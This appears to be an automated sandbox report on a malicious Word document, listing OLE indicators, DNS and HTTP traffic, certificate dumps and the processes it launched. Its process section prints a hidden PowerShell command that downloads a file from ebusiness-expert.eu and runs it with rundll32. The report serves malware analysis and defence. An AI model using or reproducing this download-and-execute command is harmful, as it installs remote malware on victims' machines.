Data Raw: | 01 0f b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 d0 60 ad 59 03 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
OLE File |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Streams |
---|
Stream Path: Contents, File Type: data, Stream Size: 94 |
---|
General | |
---|---|
Stream Path: | Contents |
File Type: | data |
Stream Size: | 94 |
Entropy: | 1.91679403077 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . ^ . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 02 00 00 00 20 07 c5 08 5e 00 00 00 00 00 00 00 34 12 cd ab 02 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 ff ff 00 00 05 00 00 80 00 00 00 00 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 00 02 00 00 00 00 00 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 22, 2016 14:20:40.127125025 CEST | 64828 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:40.908885956 CEST | 53 | 64828 | 8.8.8.8 | 192.168.1.16 |
Sep 22, 2016 14:20:41.614145994 CEST | 49906 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:41.777976036 CEST | 53 | 49906 | 8.8.8.8 | 192.168.1.16 |
Sep 22, 2016 14:20:41.779290915 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:41.779318094 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:41.779747009 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:41.823200941 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:41.823227882 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.050091028 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.165142059 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.165169001 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.165364981 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:44.165400028 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.379561901 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.379746914 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:44.565505981 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:44.565541983 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.808506012 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.035645962 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:45.035675049 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.284166098 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.398906946 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.398940086 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.399053097 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:45.399070978 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.408037901 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.408092976 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.408174038 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:45.408586025 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:45.408622980 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:50.512084961 CEST | 56904 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:50.907779932 CEST | 53 | 56904 | 8.8.8.8 | 192.168.1.16 |
Sep 22, 2016 14:20:50.955172062 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 |
Sep 22, 2016 14:20:50.955213070 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 |
Sep 22, 2016 14:20:50.955291033 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 |
Sep 22, 2016 14:20:50.956690073 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 |
Sep 22, 2016 14:20:50.956716061 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 |
Sep 22, 2016 14:20:52.225730896 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 |
Sep 22, 2016 14:20:52.427665949 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 |
Sep 22, 2016 14:20:52.427788019 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 |
Sep 22, 2016 14:20:52.670106888 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 22, 2016 14:20:40.127125025 CEST | 64828 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:40.908885956 CEST | 53 | 64828 | 8.8.8.8 | 192.168.1.16 |
Sep 22, 2016 14:20:41.614145994 CEST | 49906 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:41.777976036 CEST | 53 | 49906 | 8.8.8.8 | 192.168.1.16 |
Sep 22, 2016 14:20:50.512084961 CEST | 56904 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:50.907779932 CEST | 53 | 56904 | 8.8.8.8 | 192.168.1.16 |
ICMP Packets |
---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Sep 22, 2016 14:22:24.778304100 CEST | 192.168.1.16 | 8.8.8.8 | cf09 | (Port unreachable) | Destination Unreachable |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Sep 22, 2016 14:20:40.127125025 CEST | 192.168.1.16 | 8.8.8.8 | 0x128c | Standard query (0) | www.maxmind.com | A (IP address) | IN (0x0001) |
Sep 22, 2016 14:20:41.614145994 CEST | 192.168.1.16 | 8.8.8.8 | 0x6864 | Standard query (0) | www.maxmind.com | A (IP address) | IN (0x0001) |
Sep 22, 2016 14:20:50.512084961 CEST | 192.168.1.16 | 8.8.8.8 | 0xd2ef | Standard query (0) | ebusiness-expert.eu | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Replay Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Sep 22, 2016 14:20:40.908885956 CEST | 8.8.8.8 | 192.168.1.16 | 0x128c | No error (0) | www.maxmind.com | 104.16.38.47 | A (IP address) | IN (0x0001) | |
Sep 22, 2016 14:20:41.777976036 CEST | 8.8.8.8 | 192.168.1.16 | 0x6864 | No error (0) | www.maxmind.com | 104.16.38.47 | A (IP address) | IN (0x0001) | |
Sep 22, 2016 14:20:50.907779932 CEST | 8.8.8.8 | 192.168.1.16 | 0xd2ef | No error (0) | ebusiness-expert.eu | 84.246.227.126 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header | Total Bytes Transfered (KB) |
---|---|---|---|---|---|---|
Sep 22, 2016 14:20:50.956690073 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 | 14 | |
Sep 22, 2016 14:20:52.225730896 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 | 14 | |
Sep 22, 2016 14:20:52.427665949 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 | 15 |
HTTPS Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Subject | Issuer | Not Before | Not After | Raw |
---|---|---|---|---|---|---|---|---|---|
Sep 22, 2016 14:20:44.379561901 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 | CN=*.maxmind.com, OU=PremiumSSL Wildcard, O=MaxMind Inc., STREET=14 Spring Street, STREET=3rd Floor, L=Waltham, ST=MA, OID.2.5.4.17=02451, C=US | CN=COMODO RSA Organization Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon Sep 19 02:00:00 CEST 2016 | Thu Nov 01 00:59:59 CET 2018 | [[ Version: V3 Subject: CN=*.maxmind.com, OU=PremiumSSL Wildcard, O=MaxMind Inc., STREET=14 Spring Street, STREET=3rd Floor, L=Waltham, ST=MA, OID.2.5.4.17=02451, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 25905975660607919200916255466913853587381951908787144446826115983178266995282026210045332181791383011655735556100736639157438893417259232659256940909109199519561743581338186771868290612341886707749613185794684870626428363677398210096294484940479570002592279174890587075542527208622213984022484043795263030905811810836383365156198582555056433643719909022987498680432209473269684890733407884665440736461747876280611107949278322924728692810339267353784214411681732216520086081771039649612397672162094330474984399127791688023971157869208592800747877873616044812691473906356533840151043504392805465969911458616069245433047 public exponent: 65537 Validity: [From: Mon Sep 19 02:00:00 CEST 2016, To: Thu Nov 01 00:59:59 CET 2018] Issuer: CN=COMODO RSA Organization Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 3f357dfa ab680235 8be19e31 8e5a44c0]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSAOrganizationValidationSecureServerCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 9A F3 2B DA CF AD 4F B6 2F BB 2A 48 48 2A 12 B7 ..+...O./.*HH*..0010: 1B 42 C1 24 .B.$]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSAOrganizationValidationSecureServerCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.6449.1.2.1.3.4][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1D 68 74 74 70 73 3A 2F 2F 73 65 63 75 72 65 ..https://secure0010: 2E 63 6F 6D 6F 64 6F 2E 63 6F 6D 2F 43 50 53 .comodo.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.maxmind.com DNSName: maxmind.com][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: F2 32 B2 51 4A F6 25 39 B5 9C 4C 7F 00 A5 A9 4F .2.QJ.%9..L....O0010: ED 6B 09 59 .k.Y]]] Algorithm: [SHA256withRSA] Signature:0000: B1 94 7B F5 FE 68 50 F7 69 8C ED AD 94 7D C7 AB .....hP.i.......0010: 49 4D EF 48 9B 62 B2 0C 29 8A FA 7E F4 80 BB BC IM.H.b..).......0020: 85 60 68 21 03 8D 46 05 08 C0 71 42 89 42 35 D0 .`h!..F...qB.B5.0030: 09 BB 9A C9 69 11 BC D6 1D 84 29 5A 53 41 49 C5 ....i.....)ZSAI.0040: 25 E6 55 7F 6F B4 2E 33 25 57 C3 9F A2 EC 0E 8E %.U.o..3%W......0050: 00 64 0C 45 B2 B9 97 DC AF F5 F4 7F F0 AD C1 0E .d.E............0060: C1 AD B2 B1 D2 5A 91 5F C1 B2 F1 ED 82 90 89 B4 .....Z._........0070: 10 BE 66 C0 73 BA 99 B9 D9 B4 79 07 BF F4 FC 7E ..f.s.....y.....0080: C1 5A B3 51 3D 24 D1 90 53 D4 0D 59 B1 BD 00 0B .Z.Q=$..S..Y....0090: 25 8C 7A 48 2D 6B 09 30 2A A0 75 6B 2C 67 A9 84 %.zH-k.0*.uk,g..00A0: 0A E1 82 93 F2 9F 7D 62 E6 05 9A BD 05 5A B9 49 .......b.....Z.I00B0: CE 70 0C A8 10 DB F8 47 7D 3D EA 84 D6 14 1E B7 .p.....G.=......00C0: 9B 0E D2 3E 23 20 43 9B 6D 36 DD 60 BE EB A9 FC ...># C.m6.`....00D0: 7C 82 5E E8 E7 C8 BF 8E 40 70 B1 18 24 1E F8 44 ..^.....@p..$..D00E0: CD C6 BF C8 91 A1 ED EA 78 D4 CF 9B B3 F6 FB 82 ........x.......00F0: 02 98 0A 97 10 E6 E8 46 AB 97 CD 8A D9 31 B4 E0 .......F.....1..] |
Sep 22, 2016 14:20:44.379561901 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 | CN=COMODO RSA Organization Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Wed Feb 12 01:00:00 CET 2014 | Mon Feb 12 00:59:59 CET 2029 | [[ Version: V3 Subject: CN=COMODO RSA Organization Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 2048 bits modulus: 23364367789036248764590828559588945800909566501163552850831319026372050621561141974867931129224289911597268001113115319922107502170172386798023552044795591961279900983716424910423503821711700982244292822879352157001097904621813115928692278219697856090754314902955943857790735148714110025435709131947757760267515265061518866212636001729393009489201641719809777246465916057529290521495765725771731634778646123645562584934347526131342668094157399273643290137423132170132315316173819420457265551254978415915289520899948162548523911781373038947884090061597540073867393017150592856570521601968313241771358805248224596500073 public exponent: 65537 Validity: [From: Wed Feb 12 01:00:00 CET 2014, To: Mon Feb 12 00:59:59 CET 2029] Issuer: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 36825e7f b5a48193 7ef6d173 6bb93ca6]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSAAddTrustCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSACertificationAuthority.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 9A F3 2B DA CF AD 4F B6 2F BB 2A 48 48 2A 12 B7 ..+...O./.*HH*..0010: 1B 42 C1 24 .B.$]]] Algorithm: [SHA384withRSA] Signature:0000: 69 8A 36 68 9A 1E 3B 65 0B E0 7C CF A6 AB 71 3B i.6h..;e......q;0010: AF 61 A4 3F E4 64 01 49 10 D3 1D 8F E2 D5 ED 67 .a.?.d.I.......g0020: D3 9E 5B 97 BD 42 1E 07 F9 D0 BB 6D F7 32 95 5A ..[..B.....m.2.Z0030: 22 29 62 F8 0C 9C 59 56 27 36 A0 22 12 11 FA 47 ")b...YV'6."...G0040: F4 51 C9 59 7B 29 4A A5 48 35 7C C5 97 66 E0 27 .Q.Y.)J.H5...f.'0050: 25 3B 15 7A 32 75 4A 91 FB A6 6B 9E E2 53 FA 0D %;.z2uJ...k..S..0060: 8C 13 FB 23 B8 0B 12 2C AE ED DB 1D 47 90 D5 D0 ...#...,....G...0070: 93 69 76 91 38 15 34 D7 18 EA 7E BC 6B 58 DE 2A .iv.8.4.....kX.*0080: 39 90 03 44 04 4A 56 D8 68 E5 F5 7C 69 7E 9E 7D 9..D.JV.h...i...0090: 54 4B D0 D8 86 AB 67 66 13 57 5E 89 2A 17 AD 2D TK....gf.W^.*..-00A0: AE BD 40 0E 66 ED 8A FF 54 B4 C1 01 CB A9 E0 47 ..@.f...T......G00B0: BA 11 61 8F AD AE 23 48 2A C6 25 79 89 1C 41 04 ..a...#H*.%y..A.00C0: 95 C0 11 EA 57 2B D6 B4 97 FA B1 E9 15 62 EC 4A ....W+.......b.J00D0: 71 77 FD F3 A1 9C DA F6 6B 00 29 C5 32 E7 FA 4E qw......k.).2..N00E0: EA B3 2A A7 18 97 1C 58 A7 42 36 5F EC 14 CF F8 ..*....X.B6_....00F0: 7B 0E F7 DD CC 88 15 9A 9A 5C C8 F1 20 C7 D1 86 .........\.. ...0100: 72 A1 17 9B AE BA FE 6C A8 32 D1 00 76 49 73 F7 r......l.2..vIs.0110: 3F 27 87 3C B6 C9 2D FA AA 90 90 C9 0A 09 9F C9 ?'.<..-.........0120: 69 1F 07 19 A9 BF DE BA F8 0B 88 82 44 16 10 7F i...........D...0130: 07 C0 80 22 5F 7F BC 30 DE BA CD 07 79 64 56 D8 ..."_..0....ydV.0140: FF F3 4F 9C 30 BB 6E 1E 51 4B E6 CD BD 17 C4 C5 ..O.0.n.QK......0150: BF C8 3F 8E B1 1F 8A 46 B7 06 43 6F 62 2D CF 51 ..?....F..Cob-.Q0160: 9D 45 CA 8A E9 13 8B C0 C7 91 BE 5B B6 FA 37 4A .E.........[..7J0170: 89 FE F0 9D DA 13 26 22 2C 06 90 3E 8B 13 98 A0 ......&",..>....0180: 19 D6 DD DA 4A 48 7F 3D 0F 89 9D 24 72 4B 0E 7B ....JH.=...$rK..0190: 44 FF D4 36 B6 83 76 23 58 8B 14 6C B8 5D F7 61 D..6..v#X..l.].a01A0: 6D 39 76 ED DD 12 3D 6B 87 88 97 91 BE C0 46 02 m9v...=k......F.01B0: 1E 76 1C DD B6 AF 5C 4F F5 00 D6 9C 4D A9 E0 9E .v....\O....M...01C0: A2 8E FC B1 16 79 5C 21 D3 45 81 9A 0C 39 6C 6D .....y\!.E...9lm01D0: 28 D7 25 D2 B7 11 90 D0 F6 DE 6F 5E F4 FA A4 8B (.%.......o^....01E0: 66 77 72 2F 9B 90 40 2C 52 12 60 F9 FF B5 70 2E fwr/..@,R.`...p.01F0: 89 9A 79 09 89 81 2D EC 5C 78 6F 81 87 F1 FC 55 ..y...-.\xo....U] |
Sep 22, 2016 14:20:44.379561901 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE | Tue May 30 12:48:38 CEST 2000 | Sat May 30 12:48:38 CEST 2020 | [[ Version: V3 Subject: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 4096 bits modulus: 595250832037245141724642107398533641144111340640849154810839512193646804439589382557795096048235159392412856809181253983148280442751106836828767077478502910675291715965426418324395462826337195608826159904332409833532414343087397304684051488024083060971973988667565926401713702437407307790551210783180012029671811979458976709742365579736599681150756374332129237698142054260771585540729412505699671993111094681722253786369180597052805125225748672266569013967025850135765598233721214965171040686884703517711864518647963618102322884373894861238464186441528415873877499307554355231373646804211013770034465627350166153734933786011622475019872581027516832913754790596939102532587063612068091625752995700206528059096165261547017202283116886060219954285939324476288744352486373249118864714420341870384243932900936553074796547571643358129426474424573956572670213304441994994142333208766235762328926816055054634905252931414737971249889745696283503174642385591131856834241724878687870772321902051261453524679758731747154638983677185705464969589189761598154153383380395065347776922242683529305823609958629983678843126221186204478003285765580771286537570893899006127941280337699169761047271395591258462580922460487748761665926731923248227868312659 public exponent: 65537 Validity: [From: Tue May 30 12:48:38 CEST 2000, To: Sat May 30 12:48:38 CEST 2020] Issuer: CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE SerialNumber: [ 2766ee56 eb49f38e abd770a2 fc84de22]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.usertrust.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: AD BD 98 7A 34 B4 26 F7 FA C4 26 54 EF 03 BD E0 ...z4.&...&T....0010: 24 CB 54 1A $.T.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.usertrust.com/AddTrustExternalCARoot.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]]] Algorithm: [SHA384withRSA] Signature:0000: 64 BF 83 F1 5F 9A 85 D0 CD B8 A1 29 57 0D E8 5A d..._......)W..Z0010: F7 D1 E9 3E F2 76 04 6E F1 52 70 BB 1E 3C FF 4D ...>.v.n.Rp..<.M0020: 0D 74 6A CC 81 82 25 D3 C3 A0 2A 5D 4C F5 BA 8B .tj...%...*]L...0030: A1 6D C4 54 09 75 C7 E3 27 0E 5D 84 79 37 40 13 .m.T.u..'.].y7@.0040: 77 F5 B4 AC 1C D0 3B AB 17 12 D6 EF 34 18 7E 2B w.....;.....4..+0050: E9 79 D3 AB 57 45 0C AF 28 FA D0 DB E5 50 95 88 .y..WE..(....P..0060: BB DF 85 57 69 7D 92 D8 52 CA 73 81 BF 1C F3 E6 ...Wi...R.s.....0070: B8 6E 66 11 05 B3 1E 94 2D 7F 91 95 92 59 F1 4C .nf.....-....Y.L0080: CE A3 91 71 4C 7C 47 0C 3B 0B 19 F6 A1 B1 6C 86 ...qL.G.;.....l.0090: 3E 5C AA C4 2E 82 CB F9 07 96 BA 48 4D 90 F2 94 >\.........HM...00A0: C8 A9 73 A2 EB 06 7B 23 9D DE A2 F3 4D 55 9F 7A ..s....#....MU.z00B0: 61 45 98 18 68 C7 5E 40 6B 23 F5 79 7A EF 8C B5 aE..h.^@k#.yz...00C0: 6B 8B B7 6F 46 F4 7B F1 3D 4B 04 D8 93 80 59 5A k..oF...=K....YZ00D0: E0 41 24 1D B2 8F 15 60 58 47 DB EF 6E 46 FD 15 .A$....`XG..nF..00E0: F5 D9 5F 9A B3 DB D8 B8 E4 40 B3 CD 97 39 AE 85 .._......@...9..00F0: BB 1D 8E BC DC 87 9B D1 A6 EF F1 3B 6F 10 38 6F ...........;o.8o] |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 14:21:10 |
Start date: | 22/09/2016 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | unknown |
Imagebase: | 0x2f210000 |
File size: | 1422168 bytes |
MD5 hash: | 113371C5AC72FCE072F707C55E7845B9 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 14:21:28 |
Start date: | 22/09/2016 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -c $tmp=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://ebusiness-expert.eu/mso/onedrive' $tmp);rundll32 $tmp DllRegisterServer |
Imagebase: | 0x77120000 |
File size: | 452608 bytes |
MD5 hash: | 92F44E405DB16AC55D97E3BFE3B132FA |
Programmed in: | .Net C# or VB.NET |
General |
---|
Start time: | 14:21:35 |
Start date: | 22/09/2016 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\system32\rundll32.exe C:\Users\admin\AppData\Local\Temp\tmpC4E1.tmp DllRegisterServer |
Imagebase: | 0xff0000 |
File size: | 44544 bytes |
MD5 hash: | 51138BEEA3E2C21EC44D0932C71762A8 |
Programmed in: | C, C++ or other language |
Disassembly |
---|
Code Analysis |
---|